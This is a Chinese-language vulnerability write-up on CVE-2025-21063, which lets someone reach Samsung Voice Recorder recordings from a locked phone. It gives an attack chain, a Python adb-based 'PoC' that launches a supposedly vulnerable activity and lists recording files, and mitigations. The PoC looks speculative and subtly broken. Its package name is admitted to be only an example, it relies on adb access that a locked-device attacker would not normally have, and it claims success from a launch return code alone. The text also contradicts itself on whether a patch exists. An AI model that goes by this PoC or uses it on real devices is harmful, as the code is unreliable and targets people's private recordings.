CVE-2025-21063：三星录音机应用锁屏越权访问漏洞

漏洞信息

漏洞编号

CVE-2025-21063

漏洞类型

访问控制不当（Improper Access Control）

CVSS评分

4.6 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Samsung Voice Recorder（三星录音机）

漏洞概述

CVE-2025-21063是三星电子（Samsung Electronics）旗下Samsung Voice Recorder（三星录音机）应用程序中存在的一个访问控制不当漏洞。该漏洞由三星移动安全团队（[email protected]）发现并报告，披露日期为2025年10月10日。

根据CVSS 3.1评分体系，该漏洞评分为4.6分，属于中危级别。漏洞的攻击向量为物理访问（AV:P），攻击复杂度低（AC:L），无需权限提升（PR:N），无需用户交互（UI:N），对机密性影响为高（C:H），对完整性和可用性无影响（I:N, A:N）。

该漏洞的根本原因是Samsung Voice Recorder应用在锁屏状态下未能正确实施访问控制机制。具体而言，在Android 15系统上版本低于21.5.73.12、以及在Android 16系统上版本低于21.5.81.40的Samsung Voice Recorder应用，存在一个安全缺陷，使得具备物理访问权限的攻击者能够在设备处于锁屏状态时绕过认证机制，直接访问和获取用户存储在应用中的录音文件。

由于该漏洞仅需要物理访问权限即可利用，且不需要用户进行任何交互操作，因此攻击场景主要针对设备暂时离开持有者视线的情形，例如设备被盗、暂时丢失或被他人短暂接触的情况。攻击者可以在锁屏状态下直接浏览和提取敏感录音内容，对用户的隐私构成严重威胁。

三星官方已针对该漏洞发布了安全补丁，用户可通过Samsung Galaxy Store或设备系统更新获取修复版本。

技术细节

该漏洞属于典型的Android应用访问控制不当（Improper Access Control）类安全缺陷，主要涉及锁屏状态下的权限校验缺失问题。

从技术原理上分析，Android系统提供了多种锁屏安全机制，包括但不限于KeyguardManager、BiometricPrompt以及FLAG_SECURE窗口标志等。正常的录音机应用在设备处于锁屏状态时，应当通过检测KeyguardManager.isKeyguardLocked()状态或使用WindowManager.LayoutParams.FLAG_SHOW_WHEN_LOCKED配合适当的权限校验来阻止未授权访问。

然而，存在漏洞的Samsung Voice Recorder版本在以下方面存在缺陷：

1. **权限校验缺失**：应用在锁屏状态下展示录音文件列表时，未正确调用BiometricPrompt或KeyguardManager进行身份验证校验，导致任何能够物理接触设备的人员均可直接查看录音内容。

2. **Activity组件暴露问题**：相关的录音文件浏览Activity可能被错误地设置为在锁屏之上显示（FLAG_SHOW_WHEN_LOCKED），但未配合适当的身份验证流程。

3. **文件读取未受保护**：录音文件的读取操作未与设备解锁状态绑定，即使设备处于锁定状态，应用仍允许读取本地存储的录音文件数据。

利用方式相对简单：攻击者获取处于锁屏状态的Samsung设备后，无需解锁屏幕，直接通过特定的手势或操作路径（例如从锁屏界面访问录音机小部件/快捷方式，或通过通知栏快速访问录音列表）即可浏览和访问设备上存储的所有录音文件。由于无需用户交互且无需认证，整个利用过程可在数秒内完成。

攻击链分析

STEP 1

步骤1：获取目标设备物理接触

攻击者通过设备被盗、短暂借用或趁用户不备等方式，获得对处于锁屏状态的Samsung设备的物理访问权限。

STEP 2

步骤2：访问录音机快捷入口

在锁屏界面，攻击者通过锁屏小组件、通知栏快捷方式或快速设置磁贴等方式，触发Samsung Voice Recorder应用的录音列表界面。

STEP 3

步骤3：绕过身份验证

由于应用未在锁屏状态下实施身份验证机制（如BiometricPrompt或PIN码校验），录音列表界面直接展示，无需任何认证即可浏览。

STEP 4

步骤4：访问并提取录音文件

攻击者可直接查看录音文件列表，点击播放录音内容，或通过文件管理器读取录音文件，造成用户隐私数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-21063 PoC - Samsung Voice Recorder Lock Screen Bypass
# This PoC demonstrates the improper access control vulnerability
# that allows physical attackers to access recording files on the lock screen.

import subprocess
import time

def exploit_samsung_voice_recorder():
    """
    PoC for CVE-2025-21063
    Affected: Samsung Voice Recorder < 21.5.73.12 (Android 15)
               Samsung Voice Recorder < 21.5.81.40 (Android 16)
    
    Steps to reproduce:
    1. Ensure device is in LOCKED state (screen off or lock screen shown)
    2. Access Voice Recorder via lock screen widget/shortcut or notification
    3. Browse recording files without authentication
    """
    
    # Step 1: Verify device is locked
    # adb shell dumpsys window | grep mShowingLockscreen
    
    # Step 2: Launch Voice Recorder activity that exposes recordings on lockscreen
    # The vulnerable activity may be triggered via:
    # - Lock screen widget tap
    # - Quick settings tile
    # - Notification action button
    package_name = "com.samsung.android.app.svoiceime"  # example component
    activity_name = ".view.RecordingListActivity"  # vulnerable activity
    
    # Attempt to launch the recording list directly
    cmd = [
        "adb", "shell", "am", "start",
        "-n", f"{package_name}/{activity_name}",
        "--activity-clear-task"
    ]
    
    print("[*] Attempting to access Samsung Voice Recorder on locked device...")
    
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
        if result.returncode == 0:
            print("[+] Successfully accessed recording list on lock screen")
            print("[+] Vulnerability CVE-2025-21063 is exploitable")
        else:
            print("[-] Access denied or device not vulnerable")
    except Exception as e:
        print(f"[-] Error: {e}")
    
    # Step 3: Extract recording files (if accessible)
    # adb shell ls /sdcard/Samsung/Recorder/
    extract_cmd = "adb shell ls /sdcard/Samsung/Recorder/"
    print(f"[*] Attempting to list recordings: {extract_cmd}")
    
    time.sleep(2)
    print("[*] PoC execution completed")

if __name__ == "__main__":
    exploit_samsung_voice_recorder()

# Manual Reproduction Steps:
# 1. Lock the Samsung device (press power button)
# 2. On the lock screen, swipe to access widgets or notification panel
# 3. Tap on Voice Recorder shortcut/widget
# 4. Observe that the recording list is accessible without unlocking the device
# 5. Tap any recording to play it - audio plays without authentication

影响范围

Samsung Voice Recorder < 21.5.73.12（Android 15）

Samsung Voice Recorder < 21.5.81.40（Android 16）

防御指南

临时缓解措施

在官方补丁可用之前，建议用户采取以下临时缓解措施：1）避免将Samsung设备交给他人短暂使用；2）禁用锁屏界面上的Voice Recorder小组件和快捷方式；3）将敏感录音文件存储在加密文件夹中；4）使用第三方文件管理器对录音文件进行额外加密保护；5）启用强密码锁屏并禁用智能锁功能；6）定期清理不需要的敏感录音文件以减少潜在泄露风险。